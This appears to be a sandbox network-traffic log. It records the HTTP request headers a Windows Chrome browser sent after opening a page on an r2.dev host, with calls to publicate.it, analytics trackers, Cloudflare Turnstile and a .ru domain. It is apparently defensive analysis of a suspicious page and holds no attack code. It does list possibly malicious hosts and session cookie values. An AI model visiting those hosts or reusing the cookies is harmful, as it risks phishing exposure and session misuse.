        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: pub-e1c6f3d85d51402790227684363ac52c.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/e7cf9275f425/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /css/normalize.css HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
        Source: global trafficHTTP traffic detected: GET /css/webflow.css HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
        Source: global trafficHTTP traffic detected: GET /css/publicateit.webflow.css HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
        Source: global trafficHTTP traffic detected: GET /images/2000px-Pepsi_logo_new.svg.png HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
        Source: global trafficHTTP traffic detected: GET /images/amazon.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
        Source: global trafficHTTP traffic detected: GET /images/trustpilot-1.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
        Source: global trafficHTTP traffic detected: GET /images/2000px-Pepsi_logo_new.svg.png HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
        Source: global trafficHTTP traffic detected: GET /images/amazon.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
        Source: global trafficHTTP traffic detected: GET /images/group-2.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
        Source: global trafficHTTP traffic detected: GET /images/trustedby.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
        Source: global trafficHTTP traffic detected: GET /images/download.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
        Source: global trafficHTTP traffic detected: GET /images/home_banner.png HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
        Source: global trafficHTTP traffic detected: GET /images/home_banner-p-500.png HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
        Source: global trafficHTTP traffic detected: GET /20234315.js HTTP/1.1Host: js.hs-scripts.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /js/sharethis.js HTTP/1.1Host: platform-api.sharethis.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /lftracker_v1_bElvO73dOjE4ZMqj.js HTTP/1.1Host: sc.lfeeder.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /images/microsoft.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
        Source: global trafficHTTP traffic detected: GET /js/jquery-3.5.1.min.dc5e7f18c8.js?site=5e9170ba37cf8dfae03ae1a4 HTTP/1.1Host: d3e54v103j8qbb.cloudfront.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://publicate.itsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /images/adobe.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
        Source: global trafficHTTP traffic detected: GET /images/trustpilot-1.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
        Source: global trafficHTTP traffic detected: GET /images/group-2.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
        Source: global trafficHTTP traffic detected: GET // HTTP/1.1Host: quantumspirel.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /images/groupon.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
        Source: global trafficHTTP traffic detected: GET /js/webflow.js HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
        Source: global trafficHTTP traffic detected: GET /images/logo_white_text.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
        Source: global trafficHTTP traffic detected: GET /images/trustedby.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1
        Source: global trafficHTTP traffic detected: GET /images/download.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1
        Source: global trafficHTTP traffic detected: GET /images/home_banner-p-500.png HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1
        Source: global trafficHTTP traffic detected: GET /images/nhph1-p-500.jpg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
        Source: global trafficHTTP traffic detected: GET /images/nhph2-p-500.jpg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1
        Source: global trafficHTTP traffic detected: GET /track/ce/?project=publicate.it&instance=woopra&meta=&screen=1280x1024&language=en-US&app=js-client&referer=&cookie=sB4hScRiWkjO&event=pv&timeout=600000&idptnc=eNCnXL5OXflh&ce_campaign_name=powered_by_publicate&ce_campaign_medium=referral&ce_campaign_source=publicate_user_exported_emails&ce_url=%2F%3Futm_source%3Dpublicate_user_exported_emails%26utm_medium%3Dreferral%26utm_campaign%3Dpowered_by_publicate&ce_title=Publicate%20%7C%20HTML%20Email%20Template%20Builder&ce_domain=publicate.it&ce_uri=https%3A%2F%2Fpublicate.it%2F%3Futm_source%3Dpublicate_user_exported_emails%26utm_medium%3Dreferral%26utm_campaign%3Dpowered_by_publicate&ce_scroll%20depth=0.17704470037087644&ce_returning=false HTTP/1.1Host: www.woopra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /images/nhph3-p-500.jpg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1
        Source: global trafficHTTP traffic detected: GET /images/nhph4-p-500.jpg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
